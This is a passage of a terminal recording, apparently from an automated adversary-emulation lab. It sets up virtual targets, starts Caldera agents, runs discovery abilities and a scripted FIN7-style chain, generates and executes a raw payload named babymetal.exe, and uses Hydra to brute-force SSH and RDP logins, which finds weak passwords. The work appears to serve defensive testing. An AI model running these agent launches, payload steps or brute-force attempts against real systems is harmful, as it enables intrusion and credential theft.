(4.5.2)\r\nRequirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\nRequirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\nRequirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-pac"] +[47.114305, "o", "kages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\nRequirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\nRequirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\nRequirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\nRequirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\nRequirement already satisfied: requests>=2.5.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.24.0)\r\nRequirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\nRequirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx=="] +[47.114341, "o", "3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\nRequirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\nRequirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\nRequirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.1.0)\r\nRequirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\nRequirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\nRequirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\nRequirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/"] +[47.114379, "o", "python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\nRequirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\nRequirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.5)\r\nRequirement already satisfied: docutils>=0.12 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.16)\r\nRequirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\nRequirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\nRequirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (li"] +[47.114445, "o", "ne 14)) (0.57.0)\r\nRequirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\nRequirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\nRequirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\nRequirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\nRequirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\nfatal: destination path 'caldera' already exists and is not an empty directory.\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\nfatal: destination path 'caldera' already"] +[47.114492, "o", " exists and is not an empty directory.\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"] +[47.29882, "o", "None\r\n"] +[57.386237, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"] +[57.39097, "o", "\u001b[94mpreparing target target2 ....\u001b[0m\r\n"] +[57.394121, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"] +[57.394259, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"] +[58.061945, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] +[58.062104, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] +[365.815169, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] +[366.127765, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] +[366.43231, "o", " 1 file(s) copied.\r\r\n"] +[366.448343, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] +[366.528428, "o", "\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 3 STOP_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x1\r\r\n WAIT_HINT : 0x2bf20\r\r\n"] +[366.549334, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 3 STOP_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x1\r\r\n WAIT_HINT : 0x2bf20\r\n\r\n(no stderr)\r\n"] +[371.585517, "o", " 1 file(s) copied.\r\r\n"] +[371.608795, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] +[371.666169, "o", " 1 file(s) copied.\r\r\n"] +[371.681221, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] +[371.746656, "o", " 1 file(s) copied.\r\r\n"] +[371.760721, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] +[371.830233, "o", "The operation completed successfully.\r\r\r\n"] +[371.847954, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"] +[371.922877, "o", "The operation completed successfully.\r\r\r\n"] +[371.942729, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nThe operation completed successfully.\r\n\r\nDebug: Stderr: The operation completed successfully.\r\n"] +[372.015059, "o", "The operation completed successfully.\r\r\r\n"] +[372.03526, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nThe operation completed successfully.\r\n\r\nDebug: Stderr: The operation completed successfully.\r\n"] +[374.191468, "o", "\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 2 START_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x0\r\r\n WAIT_HINT : 0x7d0\r\r\n PID : 984\r\r\n FLAGS : \r\r\n"] +[374.612598, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 2 START_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x0\r\r\n WAIT_HINT : 0x7d0\r\r\n PID : 984\r\r\n FLAGS :\r\n\r\n(no stderr)\r\n"] +[376.733509, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[441.799386, "o", "\u001b[92mTarget is up: target2 \u001b[0m\r\n\u001b[94mpreparing target target3 ....\u001b[0m\r\n"] +[441.802436, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"] +[441.802622, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"] +[445.219168, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] +[445.219374, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] +[612.735313, "o", "\u001b[92mTarget is up: target3 \u001b[0m\r\n"] +[613.105912, "o", "The account already exists.\r\r\n\r\r\n"] +[613.106507, "o", "More help is available by typing NET HELPMSG 2224.\r\r\n"] +[613.106678, "o", "\r\r\n"] +[613.377246, "o", "The account already exists.\r\r\n\r\r\n"] +[613.377462, "o", "More help is available by typing NET HELPMSG 2224.\r\r\n"] +[613.377569, "o", "\r\r\n"] +[613.651823, "o", "The account already exists.\r\r\n\r\r\nMore help is available by typing NET HELPMSG 2224.\r\r\n"] +[613.651996, "o", "\r\r\n"] +[613.919243, "o", "The account already exists.\r\r\n"] +[613.919426, "o", "\r\r\nMore help is available by typing NET HELPMSG 2224.\r\r\n"] +[613.91954, "o", "\r\r\n"] +[614.175234, "o", "System error 1378 has occurred.\r\r\n"] +[614.175403, "o", "\r\r\nThe specified account name is already a member of the group.\r\r\n"] +[614.17558, "o", "\r\r\n"] +[614.426216, "o", "System error 1378 has occurred.\r\r\n"] +[614.426371, "o", "\r\r\n"] +[614.426466, "o", "The specified account name is already a member of the group.\r\r\n"] +[614.426641, "o", "\r\r\n"] +[614.687573, "o", "System error 1378 has occurred.\r\r\n\r\r\nThe specified account name is already a member of the group.\r\r\n"] +[614.687686, "o", "\r\r\n"] +[614.952564, "o", "System error 1378 has occurred.\r\r\n"] +[614.952665, "o", "\r\r\n"] +[614.952793, "o", "The specified account name is already a member of the group.\r\r\n"] +[614.95295, "o", "\r\r\n"] +[615.211853, "o", "The operation completed successfully.\r\r\r\n"] +[615.230597, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"] +[615.69261, "o", "\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\r\n"] +[615.692721, "o", "\r\r\n"] +[615.731812, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\n\r\n(no stderr)\r\n"] +[615.768572, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[615.871724, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[615.894056, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[615.94657, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[616.252327, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] +[616.522501, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] +[616.77925, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[616.88319, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[616.968447, "o", "[SC] StartService FAILED 1056:\r\r\n\r\r\nAn instance of the service is already running.\r\r\n\r\r\n"] +[617.223748, "o", "[SC] StartService FAILED 1056:\r\r\n\r\r\nAn instance of the service is already running.\r\r\n\r\r\n"] +[619.574809, "o", "Executing (Win32_Process)->Create()\r\r\r\n"] +[619.605721, "o", "Method execution successful.\r\r\r\nOut Parameters:\r\r\ninstance of __PARAMETERS\r\r\n{\r\r\n\tProcessId = 4092;\r\r\n\tReturnValue = 0;\r\r\n};\r\r\n"] +[619.605843, "o", "\r\r\n"] +[619.657522, "o", "Command exited with status 0.\r\n=== stdout ===\r\nExecuting (Win32_Process)->Create()\r\r\r\nMethod execution successful.\r\r\r\nOut Parameters:\r\r\ninstance of __PARAMETERS\r\r\n{\r\r\n\tProcessId = 4092;\r\r\n\tReturnValue = 0;\r\r\n};\r\n\r\n=== stderr ===\r\n\r\n\r\nDebug: Stderr: \r\n"] +[624.900179, "o", "cp: './idpx' and '/home/vagrant/idpx' are the same file\r\n"] +[625.360739, "o", "cp: './idpx' and '/home/vagrant/idpx' are the same file\r\n"] +[625.666636, "o", "None\r\n\u001b[94mStarting Caldera client target2 \u001b[0m\r\n"] +[626.241241, "o", "wmic process call create \"%userprofile%\\splunkd.go -server http://192.168.178.132:8888 -group red_windows -paw target2w\" \r\n"] +[626.255297, "o", "None\r\n\u001b[92mCaldera client started \u001b[0m\r\n"] +[626.255338, "o", "\u001b[92mInitial start of caldera client: target3 \u001b[0m\r\n\u001b[94mStarting Caldera client target3 \u001b[0m\r\n"] +[626.264956, "o", "cd /home/vagrant; chmod +x caldera_agent.sh; nohup bash ./caldera_agent.sh\r\n"] +[626.266353, "o", "None\r\n\u001b[92mCaldera client started \u001b[0m\r\n"] +[626.266412, "o", "\u001b[92mInitial start of caldera client: target3 \u001b[0m\r\n"] +[646.285467, "o", "\u001b[94mContacting caldera agents on all targets ....\u001b[0m\r\n"] +[646.293778, "o", "\u001b[92mCaldera agents reached\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\n"] +[646.754051, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221271.460396', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[646.758928, "o", "Got:\r\n"] +[646.760695, "o", "[]\r\n"] +[646.954014, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: bd527b63-9f9e-46e0-9816-b8434d2b8989 \u001b[0m\r\n\u001b[104m Current User: Obtain user from current session \u001b[0m\r\n"] +[687.011907, "o", "'target2w\\\\attackx\\r'\r\n"] +[687.313306, "o", "\u001b[94mRestarting caldera server and waiting for clients to re-connect\u001b[0m\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"] +[687.345847, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[687.370986, "o", "None\r\n"] +[697.460587, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"] +[731.612754, "o", "\u001b[92mRestarted caldera server clients re-connected\u001b[0m\r\n"] +[732.055067, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221356.779327', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[732.06055, "o", "Got:\r\n"] +[732.062419, "o", "[]\r\n"] +[732.256434, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target3 Group: red_linux Ability: bd527b63-9f9e-46e0-9816-b8434d2b8989 \u001b[0m\r\n\u001b[104m Current User: Obtain user from current session \u001b[0m\r\n"] +[792.342252, "o", "'vagrant'\r\n"] +[792.654227, "o", "\u001b[94mRestarting caldera server and waiting for clients to re-connect\u001b[0m\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"] +[792.686988, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[792.688926, "o", "None\r\n"] +[802.77716, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"] +[828.884346, "o", "\u001b[92mRestarted caldera server clients re-connected\u001b[0m\r\n\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\nAttacking machine with PAW: target2w with attack: fin7_1\r\n"] +[828.887288, "o", "\u001b[94mStep 1: Initial Breach\u001b[0m\r\n\u001b[92mEnd Step 1: Initial Breach\u001b[0m\r\n\u001b[94mStep 2: Delayed Malware Execution\u001b[0m\r\n\u001b[92mEnd Step 2: Delayed Malware Execution\u001b[0m\r\n"] +[828.887345, "o", "\u001b[94mStep 3: Target Assessment\u001b[0m\r\n\u001b[96mnew view \u001b[0m\r\n"] +[829.351867, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221454.053941', 'rules': [], 'relationships': [], 'facts': [{'trait': 'remote.host.fqdn', 'value': '192.168.178.189'}]}\r\n"] +[829.358865, "o", "Got:\r\n"] +[829.360445, "o", "[]\r\n"] +[829.55338, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: deeac480-5c2a-42b5-90bb-41675ee53c7e \u001b[0m\r\n\u001b[104m View remote shares: View the shares of a remote host \u001b[0m\r\n"] +[869.610888, "o", "('Shared resources at \\\\\\\\192.168.178.189\\r'\r\n '\\r'\r\n '\\r'\r\n '\\r'\r\n 'Share name Type Used as Comment \\r'\r\n '\\r'\r\n '-------------------------------------------------------------------------------\\r'\r\n 'ADMIN$ Disk Remote Admin \\r'\r\n 'C$ Disk Default share \\r'\r\n 'IPC$ IPC Remote IPC \\r'\r\n 'The command completed successfully.\\r'\r\n '\\r')\r\n"] +[869.913776, "o", "\u001b[96mget-wmiobject win32_computersystem | fl model\u001b[0m\r\n"] +[870.362918, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221495.0803838', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[870.368332, "o", "Got:\r\n"] +[870.370061, "o", "[]\r\n"] +[870.54879, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 5dc841fd-28ad-40e2-b10e-fb007fe09e81 \u001b[0m\r\n\u001b[104m Virtual or Real: Determine if the system is virtualized or physical \u001b[0m\r\n"] +[910.610526, "o", "'\\r\\rmodel : VirtualBox\\r\\r\\r\\r'\r\n"] +[910.911601, "o", "\u001b[96mquery USERNAME env\u001b[0m\r\n"] +[911.366975, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221536.0781682', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[911.374615, "o", "Got:\r\n"] +[911.376091, "o", "[]\r\n"] +[911.568012, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: c0da588f-79f0-4263-8998-7496b1a40596 \u001b[0m\r\n\u001b[104m Identify active user: Find user running agent \u001b[0m\r\n"] +[961.634485, "o", "'AttackX\\r'\r\n"] +[961.922261, "o", "\u001b[96mNetwork configuration discovery. Original is some WMI, here we are using nbstat\u001b[0m\r\n"] +[962.354441, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221587.0888445', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[962.361309, "o", "Got:\r\n"] +[962.363184, "o", "[]\r\n"] +[962.565536, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 14a21534-350f-4d83-9dd7-3c56b93a0c17 \u001b[0m\r\n\u001b[104m Find Domain: Find Domain information \u001b[0m\r\n"] +[1022.651477, "o", "(' \\r'\r\n 'Ethernet:\\r'\r\n 'Node IpAddress: [10.0.2.15] Scope Id: []\\r'\r\n '\\r'\r\n ' NetBIOS Local Name Table\\r'\r\n '\\r'\r\n ' Name Type Status\\r'\r\n ' ---------------------------------------------\\r'\r\n ' TARGET2W <00> UNIQUE Registered \\r'\r\n ' WORKGROUP <00> GROUP Registered \\r'\r\n ' TARGET2W <20> UNIQUE Registered \\r'\r\n ' \\r'\r\n 'Ethernet 2:\\r'\r\n 'Node IpAddress: [192.168.178.189] Scope Id: []\\r'\r\n '\\r'\r\n ' NetBIOS Local Name Table\\r'\r\n '\\r'\r\n ' Name Type Status\\r'\r\n "] +[1022.651596, "o", "' ---------------------------------------------\\r'\r\n ' TARGET2W <00> UNIQUE Registered \\r'\r\n ' WORKGROUP <00> GROUP Registered \\r'\r\n ' TARGET2W <20> UNIQUE Registered \\r')\r\n"] +[1022.975533, "o", "\u001b[96mSystem info discovery, as close as it gets\u001b[0m\r\n"] +[1023.474736, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221648.1421063', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[1023.480623, "o", "Got:\r\n"] +[1023.482996, "o", "[]\r\n"] +[1023.687796, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: b6b105b9-41dc-490b-bc5c-80d699b82ce8 \u001b[0m\r\n\u001b[104m Find OS Version: Find OS Version \u001b[0m\r\n"] +[1053.731621, "o", "('\\r'\r\n 'Major Minor Build Revision\\r'\r\n '----- ----- ----- --------\\r'\r\n '10 0 19042 0 \\r'\r\n '\\r'\r\n '\\r')\r\n"] +[1054.052628, "o", "\u001b[96mTake screenshot\u001b[0m\r\n"] +[1054.464586, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221679.219213', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[1054.469042, "o", "Got:\r\n"] +[1054.470495, "o", "[]\r\n"] +[1054.651863, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 316251ed-6a28-4013-812b-ddf5b5b007f8 \u001b[0m\r\n\u001b[104m Screen Capture: capture the contents of the screen \u001b[0m\r\n"] +[1124.744184, "o", "('Exception calling \"CopyFromScreen\" with \"3\" argument(s): \"The handle is '\r\n 'invalid\"\\r'\r\n 'At line:1 char:252\\r'\r\n '+ ... ge($bmp); $graphics.CopyFromScreen($bounds.Location, [Drawing.Point '\r\n '...\\r'\r\n '+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r'\r\n ' + CategoryInfo : NotSpecified: (:) [], '\r\n 'MethodInvocationException\\r'\r\n ' + FullyQualifiedErrorId : Win32Exception\\r'\r\n ' \\r')\r\n"] +[1125.047509, "o", "\u001b[92mEnd Step 3: Target Assessment\u001b[0m\r\n\u001b[94mStep 4: Staging Interactive Toolkit\u001b[0m\r\n\u001b[96mCreate babymetal replacement\u001b[0m\r\n"] +[1129.833274, "o", "No encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\n"] +[1129.835002, "o", "Saved as: babymetal.exe\r\n"] +[1129.880806, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nNo encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\nSaved as: babymetal.exe\r\n\r\nDebug: Stderr: No encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\nSaved as: babymetal.exe\r\n"] +[1129.943892, "o", "\u001b[96mGenerated babymetal.exe...deploying it\u001b[0m\r\n"] +[1129.994568, "o", "None\r\n"] +[1129.994607, "o", "\u001b[96mExecuted payload babymetal.exe on target2 \u001b[0m\r\n\u001b[92mEnd Step 4: Staging Interactive Toolkit\u001b[0m\r\n\u001b[94mStep 5: Escalate Privileges\u001b[0m\r\n\u001b[92mEnd Step 5: Escalate Privileges\u001b[0m"] +[1129.994741, "o", "\r\n\u001b[94mStep 6: Expand Access\u001b[0m\r\n\u001b[92mEnd Step 6: Expand Access\u001b[0m\r\n\u001b[94mStep 7: Setup User Monitoring\u001b[0m\r\n\u001b[92mEnd Step 7: Setup User Monitoring\u001b[0m\r\n\u001b[94mStep 8: User Monitoring\u001b[0m\r\n\u001b[92mEnd Step 8: User Monitoring\u001b[0m\r\n\u001b[94mStep 9: Setup Shim Persistence\u001b[0m\r\n\u001b[92mEnd Step 9: Setup Shim Persistence\u001b[0m\r\n\u001b[94mStep 10: Steal Payment Data\u001b[0m\r\n\u001b[92mEnd Step 10: Steal Payment Data\u001b[0m\r\n"] +[1134.999777, "o", "Attacking machine with PAW: target3 with attack: hydra\r\n"] +[1135.011154, "o", "zsh:cd:1: no such file or directory: None\r\n"] +[1135.020669, "o", "\r\nWARNING: apt does not have a stable CLI interface. Use with caution in scripts.\r\n\r\n"] +[1135.025903, "o", "Reading package lists..."] +[1135.05476, "o", "\r\n"] +[1135.056144, "o", "Building dependency tree..."] +[1135.180674, "o", "\r\nReading state information..."] +[1135.183021, "o", "\r\n"] +[1135.34485, "o", "hydra is already the newest version (9.1-1).\r\n0 upgraded, 0 newly installed, 0 to remove and 1389 not upgraded.\r\n"] +[1135.399219, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\n"] +[1135.39932, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:55:59\r\n"] +[1135.399495, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.145:22/\r\n"] +[1135.399547, "o", "[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"] +[1135.898263, "o", "[22][ssh] host: 192.168.178.145 login: test password: test\r\n"] +[1138.064322, "o", "[22][ssh] host: 192.168.178.145 login: password password: passw0rd\r\n"] +[1143.558955, "o", "[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n"] +[1143.559084, "o", "1 of 1 target successfully completed, 2 valid passwords found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:07\r\n"] +[1143.58797, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\n"] +[1143.588112, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:56:07\r\n[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.\r\n"] +[1143.588226, "o", "[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n"] +[1143.588418, "o", "[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task\r\n[DATA] attacking rdp://192.168.178.145:3389/\r\n"] +[1144.144217, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n"] +[1144.148391, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n"] +[1144.148795, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n"] +[1144.149246, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n"] +[1144.157408, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n"] +[1144.159518, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n"] +[1144.160769, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n"] +[1144.161189, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n"] +[1144.169608, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n"] +[1144.169715, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n"] +[1144.170303, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty, continuing attacking the account.\r\n"] +[1144.170512, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n"] +[1144.178448, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n"] +[1144.179424, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n"] +[1144.179691, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n"] +[1144.18033, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: passw0rd, continuing attacking the account.\r\n"] +[1144.188691, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n"] +[1144.189722, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n"] +[1144.191904, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n"] +[1144.193944, "o", "[3389][rdp] 